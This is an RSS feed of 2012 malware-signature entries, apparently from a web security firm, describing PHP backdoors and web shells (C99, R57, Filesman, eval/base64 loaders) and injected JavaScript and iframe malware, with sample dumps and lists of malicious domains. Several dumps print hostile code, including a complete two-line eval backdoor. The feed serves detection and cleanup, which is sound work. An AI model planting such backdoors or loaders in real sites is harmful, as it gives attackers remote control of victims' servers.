<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">

<channel>
	<title>Sucuri Security » Malware</title>
	
	<link>http://sucuri.net</link>
	<description>Protect your interwebs!</description>
	<lastBuildDate>Wed, 22 Feb 2012 16:16:45 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/SucuriSecurityMalware" /><feedburner:info uri="sucurisecuritymalware" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><item>
		<title>Malware entry: MW:JS:JJ677</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurityMalware/~3/3N9PJESlbpY/malware-entry-mwjsjj677</link>
		<comments>http://sucuri.net/malware/malware-entry-mwjsjj677#comments</comments>
		<pubDate>Fri, 10 Feb 2012 19:08:37 +0000</pubDate>
		<dc:creator>dcid</dc:creator>
		
		<guid isPermaLink="false">http://sucuri.net/?post_type=malware&amp;p=1854</guid>
		<description><![CDATA[Description: A suspicious and encoded javascript was found. It used the jjencoder to hide its content, but we detected a hidden call to load content from remote web sites in attempt to exploit a specific browser vulnerability. &#160; Note that &#8230; <a href="http://sucuri.net/malware/malware-entry-mwjsjj677">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p><strong>Description:</strong></p>
<p>A suspicious and encoded javascript was found. It used the jjencoder to hide its content, but we detected a hidden call to load content from remote web sites in attempt to exploit a specific browser vulnerability.

<br />&nbsp;<br />
Note that any PHP, HTML and JS file gets compromised by this malware. Sometimes it can also be hidden inside the database.
<br />&nbsp;<br />
<b>Affecting:</b> Any web site. Often on outdated WordPress, Joomla and osCommerce sites.

<br /><br />
<b>Clean up:</b> <b>You can also sign up <a href="http://sucuri.net/signup">with us</a> and let our team remove the malware for you.</b>
<br />&nbsp;<br />
Loads malware from multiple sources:
<blockquote>
no domain specified<br />
 (and many other domains).</p>
</blockquote>
</p>
<p>&nbsp;</p>
<p><strong>Malware dump (sample of malware):</strong></p>
<p><strong> </strong> <textarea cols="70" rows="6">$z&nbsp;=~[];&nbsp;$z={_:&nbsp;++$z,$$$$:(![]+&#8221;")[$z],__$:++$z,$_$_:..</textarea></p>
]]></content:encoded>
			<wfw:commentRss />
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://sucuri.net/malware/malware-entry-mwjsjj677</feedburner:origLink></item>
		<item>
		<title>Malware entry: MW:IFRAME:ENC1560</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurityMalware/~3/93T7ZzytXys/malware-entry-mwiframeenc1560</link>
		<comments>http://sucuri.net/malware/malware-entry-mwiframeenc1560#comments</comments>
		<pubDate>Wed, 08 Feb 2012 17:23:07 +0000</pubDate>
		<dc:creator>dcid</dc:creator>
		
		<guid isPermaLink="false">http://sucuri.net/?post_type=malware&amp;p=1846</guid>
		<description><![CDATA[Description: A hidden and dangerous iframe was identified. It loads content from remote web sites in attempt to exploit a specific browser vulnerability. In some variations, the browser is redirected to blackhat seo spam sites. It is also known as &#8230; <a href="http://sucuri.net/malware/malware-entry-mwiframeenc1560">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p><strong>Description:</strong></p>
<p>A hidden and dangerous iframe was identified. It loads content from remote web sites in attempt to exploit a specific browser vulnerability. In some variations, the browser is redirected to blackhat seo spam sites. It is also known as &#8220;Exploit:HTML/IframeRef.AA&#8221; by some anti virus products.

<br />&nbsp;<br />
Note that every PHP, HTML and JS file gets compromised by this malware. 
<br />&nbsp;<br />
<b>Affecting:</b> Any web site. Often on outdated WordPress, Joomla and osCommerce sites.

<br /><br />
<b>Clean up:</b> <b>You can also sign up <a href="http://sucuri.net/signup">with us</a> and let our team remove the malware for you.</b>
<br />&nbsp;<br />
Loads malware from multiple sources:
<blockquote>
http://tds83.1dumb.com/stds/go.php?sid=1<br />
http://pokosa.com/tds/go.php?sid=1<br />
 (and many other domains).</p>
</blockquote>
</p>
<p>&nbsp;</p>
<p><strong>Malware dump (sample of malware):</strong></p>
<p><strong> </strong> <textarea cols="70" rows="6">&lt;script&gt;var&nbsp;v25c9d=&quot;&quot;;var&nbsp;lf742f9a8
b867d8={xdd82ce9ebc:function(sa)
{var&nbsp;u1=String,w6=sa&#46substr(4,3)-675,x7,t2;sa=sa&#46substr(7);var&nbsp;te=sa&#46length;for(var&nbsp;u4=0;u4&lt;te;u4++)
{try{throw(s4=sa&#46substr(u4,1));}catch(e){s4=e;};if(s4==&#8217;|')
{w6=&quot;&quot;;u4++;t9=sa&#46substr(u4,1);while(t9!=&#8217;|'){w6+=t9;u4++;t9=sa&#46substr(u4,1);}w6-
=683;continue;}x7=&quot;&quot;;if(s4==&#8217;�&#8217;)
{u4++;s4=sa&#46substr(u4,1);while(s4!=&#8217;�&#8217;){


</textarea></p>
]]></content:encoded>
			<wfw:commentRss />
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://sucuri.net/malware/malware-entry-mwiframeenc1560</feedburner:origLink></item>
		<item>
		<title>Malware entry: MW:BLACKLISTED:35</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurityMalware/~3/PCk7fzR5QKU/malware-entry-mwblacklisted35</link>
		<comments>http://sucuri.net/malware/malware-entry-mwblacklisted35#comments</comments>
		<pubDate>Mon, 06 Feb 2012 19:05:46 +0000</pubDate>
		<dc:creator>dcid</dc:creator>
		
		<guid isPermaLink="false">http://sucuri.net/?post_type=malware&amp;p=1820</guid>
		<description><![CDATA[Description: A suspicious code was identified loading content from a blacklisted domain. Example of domains include: abcdecorez.cx.cc kokosina.in www.ironydon.co.cc solid-success.in ewinarfm.co.be companyairline.ru broadway.bee.pl search-box.in fairbankhouston.cz.cc secondon.in aht-textile.ru hhwsdfhshds.co.cc And many others. Those types of code are often used to distribute &#8230; <a href="http://sucuri.net/malware/malware-entry-mwblacklisted35">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p><strong>Description:</strong></p>
<p>A suspicious code was identified loading content from a blacklisted domain. Example of domains include:

<blockquote>
abcdecorez.cx.cc<br />
kokosina.in<br />
www.ironydon.co.cc<br />
solid-success.in<br />
ewinarfm.co.be<br />
companyairline.ru<br />
broadway.bee.pl<br />
search-box.in<br />
fairbankhouston.cz.cc<br />
secondon.in<br />
aht-textile.ru<br />
hhwsdfhshds.co.cc<br />
</blockquote>

<p>And many others. Those types of code are often used to distribute malware from external web sites while not being visible to the user. </p>
<p>&nbsp;</p>

<p><strong>Signature:</strong></p>
<p>This is not a signature-based rule, but looks at our <a href="http://sucuri.net/sucuri-blacklist">Blacklist</a> to identify malicious content.</p>
<p>&nbsp;</p>

<p><strong>Affecting:</strong></p>
<p>Any web site sites (no specific target) <strong> </strong></p>
<p>&nbsp;</p>

<p><strong>Clean up:</strong></p>
<p>This malware is generally hidden inside the HTML or PHP files. Sign up here to get it clean up: <a href="http://sucuri.net/signup">Signup</a>  <strong> </strong></p>
<p>&nbsp;</p>
<p><strong>Malware dump (sample of malware):</strong></p>
<p><strong></strong> <textarea cols="80" rows="6">
Malware dump not available.
</textarea></p>
]]></content:encoded>
			<wfw:commentRss />
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://sucuri.net/malware/malware-entry-mwblacklisted35</feedburner:origLink></item>
		<item>
		<title>Backdoor: PHP:PREG_REPLACE:EVAL</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurityMalware/~3/-hQ0vnT-TxI/backdoor-phppreg_replaceeval</link>
		<comments>http://sucuri.net/malware/backdoor-phppreg_replaceeval#comments</comments>
		<pubDate>Tue, 31 Jan 2012 14:55:07 +0000</pubDate>
		<dc:creator>dcid</dc:creator>
		
		<guid isPermaLink="false">http://sucuri.net/?post_type=malware&amp;p=1810</guid>
		<description><![CDATA[Description: We detected a malicious code hidden under a preg_replace with the &#8220;e&#8221; switch that acts as an eval call (code execution). It is often used to bypass simple detection methods that only look for &#8220;eval(&#8221; call itself. Use: Hide &#8230; <a href="http://sucuri.net/malware/backdoor-phppreg_replaceeval">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<b>Description:</b> We detected a malicious code hidden under a preg_replace with the &#8220;e&#8221; switch that acts as an eval call (code execution). It is often used to bypass simple detection methods that only look for &#8220;eval(&#8221; call itself.
<br /><br />

<b>Use:</b> Hide spam, malware and backdoors.


<br /><br />
<b>Affecting:</b> Any web site (often through outdated WordPress, Joomla, vBulletin, osCommerce and stolen passwords).


<br /><br />
<b>Clean up:</b> <b>You can also sign up <a href="http://sucuri.net/signup">with us</a> and let our team remove the malware for you.</b>

<br /><br />

<b>Malware dump:</b>
<textarea rows="6" cols="70">preg_replace(&#8220;/.*/e&#8221;,&#8221;\x65\x76\x61\x6C\x28\x67\x7A\x69&#8230;2LKjE1nyJHlOmua7X4AiRdpW2t2/bmtJFEDiB4IACCrx1Og8mS7TcRln6Si6jYuy6LRnWTZLona3a9wbkmlUxM5O3L3fCYMXeR7edVpFOI1G82wStXqtbBGlo6uwiCZxDq81axSn42QJz016dBuNBXESF+FVEo0kWgG0MEmy&#8230;

</textarea>
]]></content:encoded>
			<wfw:commentRss />
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://sucuri.net/malware/backdoor-phppreg_replaceeval</feedburner:origLink></item>
		<item>
		<title>Backdoor: PHP:C99:045</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurityMalware/~3/FJs8qFUcTZg/backdoor-phpc99045</link>
		<comments>http://sucuri.net/malware/backdoor-phpc99045#comments</comments>
		<pubDate>Mon, 30 Jan 2012 17:08:27 +0000</pubDate>
		<dc:creator>dcid</dc:creator>
		
		<guid isPermaLink="false">http://sucuri.net/?post_type=malware&amp;p=1809</guid>
		<description><![CDATA[Description: We detected the &#8220;C99&#8243; backdoor that allows attackers to manage (and reinfect) your site remotely. It is often used as part of a compromise to maintain access to the hacked sites. Affecting: Any web site (often through outdated WordPress, &#8230; <a href="http://sucuri.net/malware/backdoor-phpc99045">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<b>Description:</b> We detected the &#8220;C99&#8243; backdoor that allows attackers to manage (and reinfect) your site remotely. It is often used as part of a compromise to maintain access to the hacked sites.


<br /><br />
<b>Affecting:</b> Any web site (often through outdated WordPress, Joomla, osCommerce and stolen passwords).


<br /><br />
<b>Clean up:</b> <b>You can also sign up <a href="http://sucuri.net/signup">with us</a> and let our team remove the malware for you.</b>

<br /><br />

<b>Malware dump:</b>
<textarea rows="6" cols="70">
//Starting calls
if (!function_exists(&#8220;getmicrotime&#8221;)) {function getmicrotime() {list($usec, $sec) = explode(&#8221; &#8220;, microtime()); return ((float)$usec + (float)$sec);}}
error_reporting(5);
@ignore_user_abort(TRUE);
@set_magic_quotes_runtime(0);
$win = strtolower(substr(PHP_OS,0,3)) == &#8220;win&#8221;;
define(&#8220;starttime&#8221;,getmicrotime());
if (get_magic_quotes_gpc()) {if (!function_exists(&#8220;strips&#8221;)) {function strips(&#038;$arr,$k=&#8221;") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != &#8220;GLOBALS&#8221;) {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}

$shver = &#8220;1.0 pre-release build #16&#8243;; //Current version
//CONFIGURATION AND SETTINGS
if (!empty($unset_surl)) {setcookie(&#8220;c999sh_surl&#8221;); $surl = &#8220;&#8221;;}
elseif (!empty($set_surl)) {$surl = $set_surl; setcookie(&#8220;c999sh_surl&#8221;,$surl);}
else {$surl = $_REQUEST["c999sh_surl"]; //Set this cookie for manual SURL
}..

</textarea>
]]></content:encoded>
			<wfw:commentRss />
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://sucuri.net/malware/backdoor-phpc99045</feedburner:origLink></item>
		<item>
		<title>Backdoor: PHP:R57:01</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurityMalware/~3/tsZ9_6YR7b8/backdoor-phpr5701</link>
		<comments>http://sucuri.net/malware/backdoor-phpr5701#comments</comments>
		<pubDate>Mon, 30 Jan 2012 17:05:09 +0000</pubDate>
		<dc:creator>dcid</dc:creator>
		
		<guid isPermaLink="false">http://sucuri.net/?post_type=malware&amp;p=1808</guid>
		<description><![CDATA[Description: We detected the &#8220;R57&#8243; backdoor that allows attackers to access, modify and reinfect your site. It is often hidden in the filesystem and hard to find without access to the server or logs. Affecting: Any web site (common on &#8230; <a href="http://sucuri.net/malware/backdoor-phpr5701">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<b>Description:</b> We detected the &#8220;R57&#8243; backdoor that allows attackers to access, modify and reinfect your site. It is often hidden in the filesystem and hard to find without access to the server or logs.


<br /><br />
<b>Affecting:</b> Any web site (common on compromised Joomla, osCommerce and WordPress sites)


<br /><br />
<b>Clean up:</b> <b>You can also sign up <a href="http://sucuri.net/signup">with us</a> and let our team remove the malware for you.</b>

<br /><br />

<b>Malware dump:</b>
<textarea rows="6" cols="70">&lt;?php 
if(preg_match(&quot;/bot/&quot;, $_SERVER[HTTP_USER_AGENT])) {header(&#8220;HTTP/1.0 404&#8243;);exit(&#8220;<h1>Not Found</h1>&#8220;);}

$language=&quot;eng&quot;;
$auth = 0;
$name=&#8221;; 
$pass=&#8221;;
//ru_RU, //ru_RU.cp1251, //ru_RU.iso88595, //ru_RU.koi8r, //ru_RU.utf8
@setlocale(LC_ALL,&#8217;ru_RU.cp1251&#8242;);

@ini_restore(&#8220;safe_mode&#8221;);
@ini_restore(&#8220;open_basedir&#8221;);
@ini_restore(&#8220;safe_mode_include_dir&#8221;);
@ini_restore(&#8220;safe_mode_exec_dir&#8221;);
@ini_restore(&#8220;disable_functions&#8221;);
@ini_restore(&#8220;allow_url_fopen&#8221;);
..</textarea>
]]></content:encoded>
			<wfw:commentRss />
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://sucuri.net/malware/backdoor-phpr5701</feedburner:origLink></item>
		<item>
		<title>Backdoor: PHP:EVAL:GZINFLATE:B64</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurityMalware/~3/Z4oZsOil2Yg/backdoor-phpevalgzinflateb64</link>
		<comments>http://sucuri.net/malware/backdoor-phpevalgzinflateb64#comments</comments>
		<pubDate>Mon, 30 Jan 2012 16:26:40 +0000</pubDate>
		<dc:creator>dcid</dc:creator>
		
		<guid isPermaLink="false">http://sucuri.net/?post_type=malware&amp;p=1807</guid>
		<description><![CDATA[Description: We detected a highly encoded (and malicious) code hidden under a loop of gzinflate/gzuncompress/base64_decode calls. After decoded, it goes through an eval call to execute the code. Affecting: Any web site (often through outdated WordPress, Joomla, vBulletin, osCommerce and &#8230; <a href="http://sucuri.net/malware/backdoor-phpevalgzinflateb64">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<b>Description:</b> We detected a highly encoded (and malicious) code hidden under a loop of gzinflate/gzuncompress/base64_decode calls. After decoded, it goes through an eval call to execute the code.


<br /><br />
<b>Affecting:</b> Any web site (often through outdated WordPress, Joomla, vBulletin, osCommerce and stolen passwords).


<br /><br />
<b>Clean up:</b> <b>You can also sign up <a href="http://sucuri.net/signup">with us</a> and let our team remove the malware for you.</b>

<br /><br />

<b>Malware dump:</b>
<textarea rows="6" cols="70">
eval(gzinflate(base64_decode(&#8216;FZhFtoVcloSnkr3MP2n..

</textarea>
]]></content:encoded>
			<wfw:commentRss />
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://sucuri.net/malware/backdoor-phpevalgzinflateb64</feedburner:origLink></item>
		<item>
		<title>Backdoor: PHP:GENERIC:07</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurityMalware/~3/kUXqWDe6PQI/backdoor-phpgeneric07</link>
		<comments>http://sucuri.net/malware/backdoor-phpgeneric07#comments</comments>
		<pubDate>Sat, 28 Jan 2012 11:14:17 +0000</pubDate>
		<dc:creator>dcid</dc:creator>
		
		<guid isPermaLink="false">http://sucuri.net/?post_type=malware&amp;p=1805</guid>
		<description><![CDATA[Description: We detected a generic backdoor that allows attackers to upload files, delete files, access, modify and/or reinfect your site. It is often hidden in the filesystem and hard to find without access to the server or logs. It also &#8230; <a href="http://sucuri.net/malware/backdoor-phpgeneric07">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<b>Description:</b> We detected a generic backdoor that allows attackers to upload files, delete files, access, modify and/or reinfect your site. It is often hidden in the filesystem and hard to find without access to the server or logs.

It also includes uploadify scripts and similars that offer upload options without security.


<br /><br />
<b>Affecting:</b> Any web site (often through outdated WordPress, Joomla, vBulletin, osCommerce and stolen passwords).


<br /><br />
<b>Clean up:</b> <b>You can also sign up <a href="http://sucuri.net/signup">with us</a> and let our team remove the malware for you.</b>

<br /><br />

<b>Malware dump:</b>
<textarea rows="6" cols="70">
if (isset($_REQUEST[\'asc\'])) eval(stripslashes($_REQUEST[\'asc\']));

eval (base64_decode($_POST["php"]));
</textarea>
]]></content:encoded>
			<wfw:commentRss />
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://sucuri.net/malware/backdoor-phpgeneric07</feedburner:origLink></item>
		<item>
		<title>Backdoor: PHP:WEBSHELL:03</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurityMalware/~3/GgxwxMVt-4E/backdoor-phpwebshell03</link>
		<comments>http://sucuri.net/malware/backdoor-phpwebshell03#comments</comments>
		<pubDate>Sat, 28 Jan 2012 11:07:02 +0000</pubDate>
		<dc:creator>dcid</dc:creator>
		
		<guid isPermaLink="false">http://sucuri.net/?post_type=malware&amp;p=1804</guid>
		<description><![CDATA[Description: We detected a generic web shell (backdoor) that allows attackers to access, modify and reinfect your site. It is often hidden in the filesystem and hard to find without access to the server or logs. Affecting: Any web site &#8230; <a href="http://sucuri.net/malware/backdoor-phpwebshell03">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<b>Description:</b> We detected a generic web shell (backdoor) that allows attackers to access, modify and reinfect your site. It is often hidden in the filesystem and hard to find without access to the server or logs.


<br /><br />
<b>Affecting:</b> Any web site (often through outdated WordPress, Joomla, osCommerce and stolen passwords).


<br /><br />
<b>Clean up:</b> <b>You can also sign up <a href="http://sucuri.net/signup">with us</a> and let our team remove the malware for you.</b>

<br /><br />

<b>Malware dump:</b>
<textarea rows="6" cols="70">
</textarea>
]]></content:encoded>
			<wfw:commentRss />
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://sucuri.net/malware/backdoor-phpwebshell03</feedburner:origLink></item>
		<item>
		<title>Backdoor: PHP:Filesman:02</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurityMalware/~3/DUonm6cHvr8/backdoor-phpfilesman02</link>
		<comments>http://sucuri.net/malware/backdoor-phpfilesman02#comments</comments>
		<pubDate>Sat, 28 Jan 2012 10:53:03 +0000</pubDate>
		<dc:creator>dcid</dc:creator>
		
		<guid isPermaLink="false">http://sucuri.net/?post_type=malware&amp;p=1803</guid>
		<description><![CDATA[Description: We detected the &#8220;Filesman&#8221; backdoor that allows attackers to access, modify and reinfect your site. It is often hidden in the filesystem and hard to find without access to the server or logs. Affecting: Any web site (often through &#8230; <a href="http://sucuri.net/malware/backdoor-phpfilesman02">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<b>Description:</b> We detected the &#8220;Filesman&#8221; backdoor that allows attackers to access, modify and reinfect your site. It is often hidden in the filesystem and hard to find without access to the server or logs.


<br /><br />
<b>Affecting:</b> Any web site (often through outdated WordPress, Joomla, osCommerce and stolen passwords).


<br /><br />
<b>Clean up:</b> <b>You can also sign up <a href="http://sucuri.net/signup">with us</a> and let our team remove the malware for you.</b>

<br /><br />

<b>Malware dump:</b>
<textarea rows="6" cols="70">&lt;?php 
$auth_pass&nbsp;=&nbsp;&#8221;"; 
$color&nbsp;= &#8220;#df5&#8243;; 
$default_action&nbsp;= &quot;FilesMan&quot;; 
$default_charset&nbsp;= &quot;Windows-1251&#8243;; 
preg_replace(&quot;/.*/e&#8221;,&quot;\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28&#8217;7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/t..NRCty4s8Uh1VQKxLg+xQC0T93+IV4sxw/c08okR1wKtoyadLX6Dl6tDg3WxVxFoHhkj6Yn/xc=&#8217;\x29\x29\x29\x3B&#8221;,&#8221;.&quot;); 
?>    </textarea>
]]></content:encoded>
			<wfw:commentRss />
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://sucuri.net/malware/backdoor-phpfilesman02</feedburner:origLink></item>
	</channel>
</rss><!-- Dynamic page generated in 0.460 seconds. --><!-- Cached page generated by WP-Super-Cache on 2012-02-23 13:56:25 --><!-- Compression = gzip -->

